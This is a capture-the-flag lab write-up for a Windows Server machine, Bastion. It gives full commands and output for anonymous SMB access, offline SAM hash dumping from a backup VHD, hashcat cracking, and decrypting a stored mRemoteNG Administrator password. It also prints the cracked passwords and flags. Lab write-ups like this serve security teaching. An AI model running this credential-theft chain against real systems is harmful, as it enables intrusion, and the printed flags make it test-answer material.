IP Address: 10.10.10.134
Key Exploitation Techniques:
- Offline hash extraction from VHD (SAM/SYSTEM/SECURITY hives)
mRemoteNGpassword decryption from configuration file- SMB share enumeration and VHD image retrieval
- NTLM hash cracking
- SSH for initial user access
Enumeration#
$ nmap -sC -sV -A 10.10.10.134
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Scan identified SSH and SMB services on a Windows Server 2016 machine. smbclient was used to list accessible shares.
$ smbclient -L \\\\10.10.10.134\\
Password for [WORKGROUP\shiro]: <no password>
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
The Backups share was accessible anonymously. Browsing its contents revealed a note.txt and a WindowsImageBackup directory containing VHD files.
$ smbclient \\\\10.10.10.134\\Backups
smb: \> ls
note.txt AR 116 Tue Apr 16 18:10:09 2019
WindowsImageBackup Dn 0 Fri Feb 22 20:44:02 2019
note.txt contained a hint about not transferring the entire backup file locally due to slow VPN.
> cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
The WindowsImageBackup directory contained a subdirectory (e.g., L4mpje-PC/Backup 2019-02-22 124351/) with VHD files (.vhd).
Exploitation#
Offline Hash Extraction (L4mpje)#
The SMB Backups share was mounted locally using cifs.
$ sudo mkdir -p /mnt/smb
$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
Password for root@//10.10.10.134/Backups: <no password>
The VHD was mounted at /mnt/vhd.
/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup $ ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
libguestfs-tools was installed, and guestmount was used to mount the VHD file (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd) from the mounted SMB share.
$ sudo apt install libguestfs-tools
$ sudo mkdir -p /mnt/vhd
$ sudo guestmount --add '/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd' --inspector --ro /mnt/vhd
The SAM, SYSTEM, and SECURITY registry hives were located in /mnt/vhd/Windows/System32/config.
$ ls /mnt/vhd/Windows/System32/config
...
SAM
SECURITY
SYSTEM
...
impacket-secretsdump was used with these hives to dump local NTLM hashes.
$ impacket-secretsdump -sam /mnt/vhd/Windows/System32/config/SAM -system /mnt/vhd/Windows/System32/config/SYSTEM -security /mnt/vhd/Windows/System32/config/SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
...
The NTLM hash for L4mpje (26112010952d963c8dc4217daec986d9) was cracked using hashcat (mode 1000) with rockyou.txt.
$ hashcat -m 1000 '26112010952d963c8dc4217daec986d9' /usr/share/wordlists/rockyou.txt
...
26112010952d963c8dc4217daec986d9:bureaulampje
Password for L4mpje: bureaulampje. Got SSH access using these credentials.
$ ssh L4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
b6230043379272f4b71f11740da4886e
The user.txt flag was retrieved.
Privilege Escalation#
mRemoteNG Password Decryption (Administrator)#
Enumeration of L4mpje’s AppData\Roaming directory revealed an mRemoteNG folder containing confCons.xml.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
...
22-02-2019 14:03 6.316 confCons.xml
...
confCons.xml contained an encrypted password for the Administrator user.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ... Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ...>
<Node Name="DC" Type="Connection" ... Username="Administrator" ... Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ... />
...
</mrng:Connections>
The encrypted password aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== was extracted. A public tool mRemoteNG-Decrypt was used to decrypt it.
$ git clone https://github.com/haseebT/mRemoteNG-Decrypt
$ cd mRemoteNG-Decrypt
$ python3 mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2
The decrypted password for Administrator was thXLHM96BeKL0ER2. Got SSH access as Administrator.
$ ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
9afa7bdc0dae4a62bb28217bebe7053b
The root.txt flag was retrieved.